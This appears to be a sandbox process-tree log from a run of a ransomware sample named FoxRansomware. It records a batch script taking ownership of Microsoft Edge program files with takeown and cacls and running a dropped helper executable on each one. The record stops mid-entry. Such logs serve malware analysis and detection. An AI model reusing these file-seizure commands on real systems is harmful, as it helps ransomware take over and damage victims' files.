C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\de.pak.DATA""
2⤵
PID:6984

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\de.pak.DATA" /E /G Admin:F /C
3⤵
PID:3488

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\de.pak.DATA"
3⤵
PID:6816

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "de.pak.DATA" -nobanner
3⤵
PID:6064

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "de.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:6432

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6540

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hu.pak""
2⤵
PID:6764

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6044

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hu.pak" /E /G Admin:F /C
3⤵
PID:1712

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hu.pak"
3⤵
PID:7308

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "hu.pak" -nobanner
3⤵
PID:5764

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "hu.pak" -nobanner
4⤵
- Executes dropped EXE
PID:3276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7252

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kok.pak.DATA""
2⤵
PID:5436

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kok.pak.DATA" /E /G Admin:F /C
3⤵
PID:6500

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kok.pak.DATA"
3⤵
PID:7836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "kok.pak.DATA" -nobanner
3⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "kok.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:7476

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7544

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mt.pak""
2⤵
PID:7964

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mt.pak" /E /G Admin:F /C
3⤵
PID:8160

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mt.pak"
3⤵
- Modifies file permissions
PID:8044

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "mt.pak" -nobanner
3⤵
PID:6484

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "mt.pak" -nobanner
4⤵
- Executes dropped EXE
PID:5452

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\qu.pak.DATA""
2⤵
PID:6612

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\qu.pak.DATA" /E /G Admin:F /C
3⤵
PID:5548

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\qu.pak.DATA"
3⤵
PID:5696

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "qu.pak.DATA" -nobanner
3⤵
PID:7972

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "qu.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:7412

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6584

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ta.pak""
2⤵
PID:2656

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ta.pak" /E /G Admin:F /C
3⤵
PID:6932

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ta.pak"
3⤵
PID:7140

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ta.pak" -nobanner
3⤵
PID:6812

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ta.pak" -nobanner
4⤵
- Executes dropped EXE
PID:7108

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6728

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\cy.pak""
2⤵
PID:6708

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\cy.pak" /E /G Admin:F /C
3⤵
PID:7048

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\cy.pak"
3⤵
PID:5272

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "cy.pak" -nobanner
3⤵
PID:7060

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "cy.pak" -nobanner
4⤵
- Executes dropped EXE
PID:7100

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\fa.pak.DATA""
2⤵
PID:7148

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\fa.pak.DATA" /E /G Admin:F /C
3⤵
PID:7284

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\fa.pak.DATA"
3⤵
PID:7896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "fa.pak.DATA" -nobanner
3⤵
PID:7852

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "fa.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:8076

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7720

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA""
2⤵
PID:8020

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA" /E /G Admin:F /C
3⤵
PID:1716

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\resources.pak.DATA"
3⤵
PID:5180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "resources.pak.DATA" -nobanner
3⤵
PID:6768

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "resources.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:5412

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6152

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hi.pak""
2⤵
PID:5460

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hi.pak" /E /G Admin:F /C
3⤵
PID:6216

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\hi.pak"
3⤵
PID:3616

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "hi.pak" -nobanner
3⤵
PID:6192

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "hi.pak" -nobanner
4⤵
- Executes dropped EXE
PID:7516

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7936

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kn.pak.DATA""
2⤵
PID:7672

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kn.pak.DATA" /E /G Admin:F /C
3⤵
PID:7856

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\kn.pak.DATA"
3⤵
PID:7724

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "kn.pak.DATA" -nobanner
3⤵
PID:6504

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "kn.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:6200

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5292

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mr.pak""
2⤵
PID:6748

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:7040

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mr.pak" /E /G Admin:F /C
3⤵
PID:5988

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\mr.pak"
3⤵
PID:6316

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "mr.pak" -nobanner
3⤵
PID:6124

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "mr.pak" -nobanner
4⤵
- Executes dropped EXE
PID:7588

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5680

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\nb.pak.DATA""
2⤵
PID:5472

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:6100

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\nb.pak.DATA" /E /G Admin:F /C
3⤵
PID:5412

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\nb.pak.DATA"
3⤵
- Modifies file permissions
PID:2628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "nb.pak.DATA" -nobanner
3⤵
PID:3916

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "nb.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:6864

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ro.pak""
2⤵
PID:7412

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ro.pak" /E /G Admin:F /C
3⤵
PID:7604

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\ro.pak"
3⤵
- Modifies file permissions
PID:3452

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "ro.pak" -nobanner
3⤵
PID:6440

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "ro.pak" -nobanner
4⤵
- Executes dropped EXE
PID:6152

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:6096

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\te.pak.DATA""
2⤵
PID:5980

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\te.pak.DATA" /E /G Admin:F /C
3⤵
PID:6376

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\te.pak.DATA"
3⤵
PID:6304

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "te.pak.DATA" -nobanner
3⤵
PID:5380

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "te.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:300

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA""
2⤵
PID:6812

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA" /E /G Admin:F /C
3⤵
PID:6476

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_100_percent.pak.DATA"
3⤵
PID:3184

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_100_percent.pak.DATA" -nobanner
3⤵
PID:5276

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_100_percent.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:6616

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:7048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\pt-BR.pak.DATA""
2⤵
PID:6644

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\pt-BR.pak.DATA" /E /G Admin:F /C
3⤵
PID:7580

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\pt-BR.pak.DATA"
3⤵
- Modifies file permissions
PID:2492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "pt-BR.pak.DATA" -nobanner
3⤵
PID:4768

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "pt-BR.pak.DATA" -nobanner
4⤵
- Executes dropped EXE
PID:3948

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
- Executes dropped EXE
PID:5132

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\sr.pak""
2⤵
PID:6272

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\sr.pak" /E /G Admin:F /C
3⤵
PID:5588

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\Locales\sr.pak"
3⤵
PID:7084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "sr.pak" -nobanner
3⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "sr.pak" -nobanner
4⤵
- Executes dropped EXE
PID:5716

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7320

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\vi.pak""
2⤵
PID:6952

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:5332

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\vi.pak" /E /G Admin:F /C
3⤵
PID:5728

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\Locales\vi.pak"
3⤵
- Modifies file permissions
PID:6676

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "vi.pak" -nobanner
3⤵
PID:6736

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "vi.pak" -nobanner
4⤵
PID:7940

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_100_percent.pak""
2⤵
PID:5756

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_100_percent.pak" /E /G Admin:F /C
3⤵
PID:6508

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\msedge_100_percent.pak"
3⤵
- Modifies file permissions
PID:6352

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
3⤵
PID:4972

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_100_percent.pak" -nobanner
4⤵
PID:5316

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6792

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\vi.pak.DATA""
2⤵
PID:7256

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\vi.pak.DATA" /E /G Admin:F /C
3⤵
PID:5764

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\Locales\vi.pak.DATA"
3⤵
PID:7192

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "vi.pak.DATA" -nobanner
3⤵
PID:7220

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "vi.pak.DATA" -nobanner
4⤵
PID:7176

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5828

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA""
2⤵
PID:5384

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA" /E /G Admin:F /C
3⤵
PID:6696

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\ResiliencyLinks\msedge_200_percent.pak.DATA"
3⤵
- Modifies file permissions
PID:7428

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_200_percent.pak.DATA" -nobanner
3⤵
PID:7508

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_200_percent.pak.DATA" -nobanner
4⤵
PID:6956

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:6120

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_200_percent.pak""
2⤵
PID:7304

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_200_percent.pak" /E /G Admin:F /C
3⤵
PID:6160

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\122.0.2365.52\msedge_200_percent.pak"
3⤵
- Modifies file permissions
PID:7484

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
3⤵
PID:7464

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "msedge_200_percent.pak" -nobanner
4⤵
PID:2088

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:5768

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Internal.msix""
2⤵
PID:6772

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Internal.msix" /E /G Admin:F /C
3⤵
PID:5328

C:\Windows\SysWOW64\takeown.exe
takeown /F "C:\Program Files (x86)\Microsoft\EdgeCore\122.0.2365.52\identity_proxy\win11\identity_helper.Sparse.Internal.msix"
3⤵
- Modifies file permissions
PID:7668

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c OiMV77U6.exe -accepteula "identity_helper.Sparse.Internal.msix" -nobanner
3⤵
PID:5816

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula "identity_helper.Sparse.Internal.msix" -nobanner
4⤵
PID:7800

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OiMV77U6.exe
OiMV77U6.exe -accepteula -c Run -y -p extract -nobanner
3⤵
PID:7468

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\XxdC8Nga.bat" "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\resources.pak""
2⤵
PID:6192

C:\Windows\SysWOW64\cacls.exe
cacls "C:\Program Files (x86)\Microsoft\Edge\Application\122.0.2365.52\resources.pak" /E /G Admin:F /C
3⤵
PID:7936

C:\Windows\SysWOW64\takeown.exe
